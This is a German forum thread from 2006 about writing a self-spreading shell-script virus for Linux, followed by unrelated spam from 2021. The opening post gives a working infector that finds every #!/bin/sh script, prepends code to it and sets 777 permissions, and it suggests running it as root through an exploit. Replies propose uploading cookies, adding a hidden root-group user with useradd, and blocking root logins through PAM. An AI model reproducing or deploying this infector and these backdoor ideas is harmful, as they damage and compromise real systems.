 |  | Ansätze für einen Skript-Virus unter Linux |
|  |
Verfasst am: 31.01.2006 23:08 |
|
|
duddits |
|
 |
 |
Anmeldedatum: 03.01.2006 |
Beiträge: 569 |
Wohnort: /proc |
|
|
 |
 |
 |
|
Hi,
Dieser Nachfolgende Code zeigt wie einfach es ist, mittels einem geschickt geschrieben Shell-Script ein Linux-System durcheinander zu bringen:
Code: |
#!/bin/sh
# Böses Skript
# Skript Virus Beispiel unter Linux
for f in 'find . -type f -exec grep -ql \#\!/bin/sh {} \;'
do
echo "Achtung! Ich bin der böse Virus !!!" > tmp$$
cat $f >> tmp$$
mv tmp$$ $f
chmod 777 $f
done
|
Dieses Script verfolgt den Ansatz, das es einaml ausgeführt wird, versucht alle Skripte auf dem System ausfindig zu machen und bei jedem einzelnen dann zusätzlichen Code einzufügen.
Je nachdem welcher User das Skript ausführt sind dann weniger oder mehr Skripte des Systems betroffen.
Das Ziel eines Angreifers wird antürlich sein, dass der Superuser das Skript ausführt, der damit auf einen Schlag sämtliche Skripte des Systems, die sich als Bourne-Shell zu erkennen geben, infiziert wären.
Damit der Superuser das Skript ausführen muss, könnte man dem Skript noch ein Exploit voran setzen, der dem ausführenden User, ohne dessen Wissen, zuerst priviligierte Superuser-Rechte verschaft, bevor der oben stehende Code ausgeführt werden kann.
Eine andere Möglichkeit wäre ein Skript mit dem Ziel, das sämtliche dem Skript zugänglichen Dateien gelöscht werden sollen.
Dieses Skript verfügt dann schon über Schadenspotential, als man auf den ersten Blick vermutet.
Führt man beispielsweise als "normaler" Systembenutzer ein solches Sckript aus, so werdne dementsprechend "nur" alle Dateien gelöscht, die dem User gehören. Natürlich sind auch alle Dateien davon betroffen, die mit 777-Rechten ausgestattet sind.
Führt solch ein Skript nun ein User mit Superuser Rechten aus, so sind alle Sytemdateien davon betroffen.
Wie man sieht sollte man besonders bei Linux keine unbekannten Shell Codes ausführen, den darin steckt mehr potential als man denkt.
mfg duddits |
|
|
|
|
 | |  |
Verfasst am: 01.02.2006 01:34 |
|
|
BlackLotus |
|
 |
 |
Anmeldedatum: 04.01.2006 |
Beiträge: 717 |
Wohnort: www and 127.0.0.1/localhost |
|
|
 |
 |
 |
|
Das gefällt mir
Man könnte da ja noch nen paar Erweiterungen einbauen.
Z.B. das sich das nach ner bestimmten Zeit aktiviert und alle cookies irgendwo hochläd oder so *g*  |
|
_________________ Eine Kette ist nur so stark wie ihr schwächstes Glied.
Die Welt wird nicht von denen bedroht die böse sind,sondern von denen die das Böse zulassen.
Albert Einstein
Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das
http://blackwiki.bl.ohost.de |
|
|
|
 | |  |
Verfasst am: 01.02.2006 17:05 |
|
|
duddits |
|
 |
 |
Anmeldedatum: 03.01.2006 |
Beiträge: 569 |
Wohnort: /proc |
|
|
 |
 |
 |
|
Hi,
ja das stimmt, aber damit sollte eigentlich nur verdeutlich werden, wie leicht es ist ein Linux-System zu kompromittieren.
Wenn aber der Administator des Linux Systemes sich einigermaßen außkennt dann solltes ein leichtes sein, solche Skript Viren zu erkennen und entgegen zuwirken.
Aber da viele User auch Linux-User nie mit was bösen rechnen, könnte solch ein Skript-Virus funktionieren.
Wenn ihr wollt kann ich auch zeigen mit welcher Befehlkette oder mit einem Skript solch ein Virus finden/entdecken kann.
mfg duddits |
|
|
|
|
 | |  |
Verfasst am: 01.02.2006 19:09 |
|
|
Phara0h |
|
 |
 |
Anmeldedatum: 31.12.2005 |
Beiträge: 357 |
Wohnort: /dev/RL |
|
|
 |
 |
 |
|
Nettes Script Hat was xD
Is aber eine langweilige "Schadroutine"...
Viel interessanter wäre es, wenn das Script einen User anlegen würde und diesen mit Code: | <user> ALL=(ALL) ALL | ind die etc/sudoers einträgt ^^
Dann noch den User beim graphischen Login verstecken und das Home-Verzeichnis auf /home/.<user> ändern.
Um das zu erreichen könnte man das Script ungefähr so gestalten:
Code: | sudo useradd [-d <Homedir> darf überall sein ;)] -p [der Hash des PWs] -g 0 <user> |
Das würde zwar den user nicht in die sudoers eintragen, aber ist auch unauffälliger
Ist zwar sehr unelegant, aber in Verbindung mit den Script von duddits dürfte das recht lustig sein *g* |
|
_________________
 |
|
|
|
Verfasst am: 04.02.2006 14:59 |
|
|
Abooya |
|
|
 |
Anmeldedatum: 04.02.2006 |
Beiträge: 71 |
Wohnort: #!/usr/bin/perl |
|
|
 |
 |
 |
|
*sichalslinuxnoobout*
was passiert, wenn man das macht, was phara0 meint?  |
|
_________________ this.toLowerCase();  |
|
|
|
Verfasst am: 04.02.2006 15:58 |
|
|
Cerox |
|
 |
 |
Anmeldedatum: 31.12.2005 |
Beiträge: 782 |
Wohnort: Engelskirchen |
|
|
 |
 |
 |
|
Es legt einen User an und trägt diesen in die /etc/sudoers ein, wodurch der User dann mit Root-Privilegien arbeiten kann. |
|
|
|
|
Verfasst am: 04.02.2006 16:04 |
|
|
Abooya |
|
|
 |
Anmeldedatum: 04.02.2006 |
Beiträge: 71 |
Wohnort: #!/usr/bin/perl |
|
|
 |
 |
 |
|
das ist natürlich cool  |
|
_________________ this.toLowerCase();  |
|
|
|
Verfasst am: 05.02.2006 18:46 |
|
|
duddits |
|
 |
 |
Anmeldedatum: 03.01.2006 |
Beiträge: 569 |
Wohnort: /proc |
|
|
 |
 |
 |
|
Hi,
hier mal eine Befehls Kette die alle Dateien/Ordner auf den Rechner findet die über Schreibrechte verfügen:
Code: | find / -type f \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; > ww-files
find / -type d \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; > ww-directories |
Zu der Idee mit sudores das kann nur funktionieren wenn das auf dem LInux Sstem auch installiert ist und natürlich müsste sudo auch konfiguriert sein das es erlaubt mit useradd zu arbeiten. Aber trotzdem
eine gute Idee
Ein andere Möglich keit wäre auch in den /etc/pam.d Modulen herumzuspielen und so root das anmelden zu verwehren. Natrülich müsste man sich zuvor mit einem Exploit erstmal Root-Privilegien beschaffen.
mfg duddits |
|
|
|
|
 | |  |
Verfasst am: 04.05.2007 14:38 |
|
|
BufferOverflow |
|
|
 |
Anmeldedatum: 27.09.2006 |
Beiträge: 4 |
|
|
|
 |
 |
 |
|
duddits hat Folgendes geschrieben: | Hi,
ja das stimmt, aber damit sollte eigentlich nur verdeutlich werden, wie leicht es ist ein Linux-System zu kompromittieren.
|
Achja? Geht das unter Windows nicht auch? By plaintext dateien (vbs, javascript etc.) kann ich das auch so machen und sonst nehm ich mir halt assembler ist auch net sonderlich schwer
Wenn aber der Administator des Linux Systemes sich einigermaßen außkennt dann solltes ein leichtes sein, solche Skript Viren zu erkennen und entgegen zuwirken.
Aber da viele User auch Linux-User nie mit was bösen rechnen, könnte solch ein Skript-Virus funktionieren.
Achja? Vorallem weil der User ja root Rechte hat und jede Datei überschreiben lassen kann oder? /ironie |
|
|
|
|
 | |  |
Verfasst am: 04.05.2007 19:57 |
|
|
duddits |
|
 |
 |
Anmeldedatum: 03.01.2006 |
Beiträge: 569 |
Wohnort: /proc |
|
|
 |
 |
 |
|
Hi,
Linux sowie Windows und jedes andere Betriebssystem ist immer der gleichen Gefahr ausgesetzt. Dem Benutzer. Viele Angriffe auf diese beiden Betriebssysteme benötigen oft das zu tun von einem Benutzer. Hierbei hilft z.B. Social Engineering.
Das es unter Windows nicht geht, steht hier doch nirgends und steht auch nicht zur Debatte. Natürlich ist es mit Windows genauso möglich, das CLI von Windows, also die cmd, mag zwar noch lange nicht so viele Möglichkeiten bieten wie z.B. die Bash, aber dennoch hat man auch hier die Möglichkeit Schaden anzurichten.
Wenn ein Administrator sich auskennt spielt es keine Rolle, auf welchen OS sich dieses Szenario abspielt.
Assembler ist doch stark an die jeweilige Rechnerarchitektur gebunden und damit nicht gerade sehr praktikabel, es sei den man nutzt Assembler um den Virus temporär in Source Code zurück zuschreiben, etwas verändert und anschließend wieder neu kompiliert. Denn mit Assembler kann man ja hier jetzt einen Befehl über verschiedene Wege realisieren, wie es bei den metamorphen Viren der Fall ist.
Außerdem geht es hier um Scriptviren und nicht um allgemeine Viren.
.....
„In theory you can write a virus for any OS […]“ [1]
“It’s impossible to build a virus-proof OS […]” [2]
Es wichtig zu wissen, dass es für jede Rechner- und Betriebssystemplattformen Viren geben kann, da viele Hersteller oft damit werben, das es auf Ihrer Plattform keine Viren gibt. Doch dies ist einfach falsch. Diese Tatsache bestätigt auch ein
Bericht mit dem Namen „From Little Acorns Mighty Viruses Grow“[3][4] von Alan Glover. In diesem wird berichtet, dass ein Acorn-Archimedis-Rechner, dessen gesamtes Betriebssystem auf Read-only-Memory-Hardware basierte, auch nicht vor dem Übergriff von Viren gefeit war.
[1] Alax Cox
[2] Graham Cluley
[3] Nach [Glover94]
[4] http://cyber.com/details.php?id=22§ion=detailpapers
....
Eine Diskussion über dieses Thema führe ich jederzeit gerne^^
Gruß
Daniel |
|
|
|
|
 | |  |
Verfasst am: 26.02.2021 17:16 |
|
|
warganic |
|
|
 |
Anmeldedatum: 26.02.2021 |
Beiträge: 273997 |
|
|
|
 |
 |
 |
|
|
|
|
|
 | |  |
Verfasst am: 01.04.2021 23:03 |
|
|
warganic |
|
|
 |
Anmeldedatum: 26.02.2021 |
Beiträge: 273997 |
|
|
|
 |
 |
 |
|
|
|
|
|
Verfasst am: 10.06.2021 21:44 |
|
|
varunkunni |
|
|
 |
Anmeldedatum: 02.06.2021 |
Beiträge: 17 |
|
|
|
 |
 |
 |
|
The survey is really beneficial for the Subway store because it will help them to improve their services from the viewpoint of their consumers. Also, the customers are offered many discounts and free coupons when they honestly complete the survey available at the official website created by the authorities of the store
global.subwaymy estub |
|
|
|
|
Verfasst am: 09.09.2021 20:29 |
|
|
warganic |
|
|
 |
Anmeldedatum: 26.02.2021 |
Beiträge: 273997 |
|
|
|
 |
 |
 |
|
|
|
|
|
 | |  |
Verfasst am: 02.11.2021 16:51 |
|
|
warganic |
|
|
 |
Anmeldedatum: 26.02.2021 |
Beiträge: 273997 |
|
|
|
 |
 |
 |
|
|
|
|
|
 | |  |
Foren-Übersicht » Shell-Programmierung |
Du kannst keine Beiträge in dieses Forum schreiben. Du kannst auf Beiträge in diesem Forum nicht antworten. Du kannst deine Beiträge in diesem Forum nicht bearbeiten. Du kannst deine Beiträge in diesem Forum nicht löschen. Du kannst an Umfragen in diesem Forum nicht mitmachen.
|
Alle Zeiten sind GMT + 1 Stunde
Seite 1 von 17
Gehe zu Seite 1, 2, 3 ... 15, 16, 17 Weiter
|
|
|
|